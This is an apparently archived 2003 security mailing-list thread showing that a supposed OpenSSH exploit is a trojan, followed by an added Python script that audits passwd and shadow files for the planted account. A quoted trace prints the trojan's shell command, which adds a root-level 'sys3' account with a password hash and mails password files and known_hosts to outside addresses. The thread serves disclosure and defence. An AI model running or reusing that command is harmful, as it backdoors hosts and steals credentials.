Message-ID: <1063949309.3f6a93fd9f520@postoffice.tpg.com.au>
From: vosipov at tpg.com.au (Vitaly Osipov)
Subject: Re: new openssh exploit in the wild! * is FAKE AS SH@!*

This means that the original poster (gordon last) made it up himself, because he is saying:

>> > i looked at this piece of exploit... it is binary so I'm not sure if 
>> > this is a trojan or a backdoor or a virus. but i can't see anything 
>> > strange while sniffing the exploit traffic. and i got root on several 
>> > of my openbsd boxes with that. the bruteforcer seems to be very good. 

which is obviously not true. BTW, as far as I understand, the trojan code is triggered when 
the "exploit" is run with the offset specified, and not in "bruteforcing" mode.

W.


>I'll confirm that it does this 


>The script actually opens a socket and connects to the target sshd but 
>does nothing with that connection. 


>It also takes a pretty deep look into /proc/net looking for other 
>networks attached to the device it is run from.... 


>chris 
>On Fri, 2003-09-19 at 20:02, KF wrote: 
>> printf("[*] sending shellcode\n")= 22 
>> popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo 
>> "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999 
>> 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd 
>> /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp; 
>> find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp | 
>> /usr/sbin/sendmail -f ownage_at_gmx.de 
>> m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") = 
>> 0x0804a6b0 
>> 
>> 
>> -KF 
>> 
>> 
>> gordon last wrote: 
>> > hi readers, 
>> > while i was staying idle in a so-called 0day release channel on one irc 
>> > network some scriptkiddies were 
>> > talking about a new 0day release. 
>> > 
>> > in my backlog i can see the following: 
>> > ---cut 
>> > 08:09 [R4lph] *** r3t0r (r4lph_at_xxx) has joined channel #0dayz 
>> > 08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/ 
>> > ---cut 
>> > 
>> > i looked at this piece of exploit... it is binary so I'm not sure if 
>> > this is a trojan or a backdoor or a virus. but i can't see anything 
>> > strange while sniffing the exploit traffic. and i got root on several 
>> > of my openbsd boxes with that. the bruteforcer seems to be very good. 
>> > 
>> > i also looked at "strings theosshucksass" and found nothing suspicious. 
>> > 
>> > this exploit seems to be in the wild (underground) since the beginning of 
>> > august. 
>> > 
>> > that's quite a long time, i hope most admins are patching their systems 
>> > now... because the exploit is getting round faster and faster. 
>> > 
>> > if anyone can reverse engineer this piece it would be great if he posts 
>> > his results on this list because i'm really interested in the exploitation 
>> > technique used for that bug. 
>> > 
>> > i can't get an idea of how to exploit this. 
>> > 
>> > hmm... 
>> > regards, 
>> > glast 
>> > 
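The popen() string quoted above shows what the trojaned "exploit" actually does to the host it is run on: it appends a second uid-0 account (`sys3`, uid 0, gid 103, shell `/bin/sh`) to /etc/passwd, appends a matching MD5-crypt line to /etc/shadow, and mails /etc/passwd, /etc/shadow, ifconfig output and every known_hosts file it can find to two addresses. The check an admin who ran the binary wants is therefore an audit of the account databases. The script below is an added example, not code from the thread or from any of the posters: it parses passwd- and shadow-format text, flags any uid-0 account other than the expected ones, flags whether such an account can actually log in (usable hash plus an interactive shell), and matches the exact hash string from the quoted trace. The sample files are constructed for the example; only the `sys3` lines and that hash are taken from the page. The list of non-login shells is an assumption, not something the thread states.

```python
"""Added example (not code from the thread): audit /etc/passwd and /etc/shadow
text for the backdoor account the trojaned "exploit" appends, i.e. a second
uid-0 user with an interactive shell and a usable password hash.  The sample
files below are constructed; only the sys3 lines and their MD5-crypt hash come
from the popen() string quoted in the thread."""

from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "name uid gid gecos home shell")

# Hash the trojan writes to /etc/shadow (taken verbatim from the quoted trace).
# The password behind it is not known here, but an exact match is unambiguous.
KNOWN_TROJAN_HASHES = {"$1$nWXmkX74$Ws8fX/MFI3.j5HKahNqIQ0"}

# Assumed set of shells that do not allow an interactive login.
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin", "/bin/sync"}


def parse_passwd(text):
    """Return a PasswdEntry for every well-formed line (7 colon-separated fields)."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[0]:
            continue  # blank, comment or truncated line: skip
        name, _pw, uid, gid, gecos, home, shell = fields
        try:
            entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
        except ValueError:
            continue  # non-numeric uid/gid: not a valid entry
    return entries


def parse_shadow(text):
    """Map account name -> password-hash field from shadow-format text."""
    hashes = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[0]:
            continue
        hashes[fields[0]] = fields[1]
    return hashes


def hash_is_usable(h):
    """True when the hash field permits password login (not empty, locked or '*')."""
    return bool(h) and not h.startswith(("*", "!"))


def shell_is_interactive(shell):
    return shell != "" and shell not in NOLOGIN_SHELLS


def find_extra_uid0(entries, expected=("root",)):
    """Names of uid-0 accounts other than the expected ones."""
    return [e.name for e in entries if e.uid == 0 and e.name not in expected]


def audit(passwd_text, shadow_text, expected_uid0=("root",)):
    """Return (finding, account) pairs; an empty list means nothing suspicious."""
    entries = parse_passwd(passwd_text)
    hashes = parse_shadow(shadow_text)
    findings = []
    for e in entries:
        h = hashes.get(e.name, "")
        if h in KNOWN_TROJAN_HASHES:
            findings.append(("known-trojan-hash", e.name))
        if e.uid == 0 and e.name not in expected_uid0:
            findings.append(("extra-uid0-account", e.name))
            if hash_is_usable(h) and shell_is_interactive(e.shell):
                findings.append(("uid0-login-possible", e.name))
    # A shadow line with no passwd counterpart is also worth a look.
    names = {e.name for e in entries}
    for name in hashes:
        if name not in names:
            findings.append(("orphan-shadow-entry", name))
    return findings


# Constructed sample: an ordinary passwd/shadow pair plus the two lines the
# trojan appends (sys3 lines taken from the quoted popen() string).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sys3:x:0:103::/:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$constructedsalt$constructedrootHashValueForTheExample:12311:0:99999:7:::
daemon:*:12311:0:99999:7:::
sshd:*:12311:0:99999:7:::
alice:$6$constructedsalt$constructedAliceHashValueForExample:12311:0:99999:7:::
sys3:$1$nWXmkX74$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:99999:7:::
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print("%-22s %s" % finding)
```

Run it against the real files with `audit(open("/etc/passwd").read(), open("/etc/shadow").read())` as root. The exact-hash match only catches this particular sample; the uid-0 and login-possible checks are the ones that generalise to any planted account, and they are cheap enough to run from cron. The rest of the payload (the `/tmp/.tmp` staging file, the outbound sendmail to the two addresses in the trace) leaves traces in the mail log rather than in the account databases, so check those separately.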

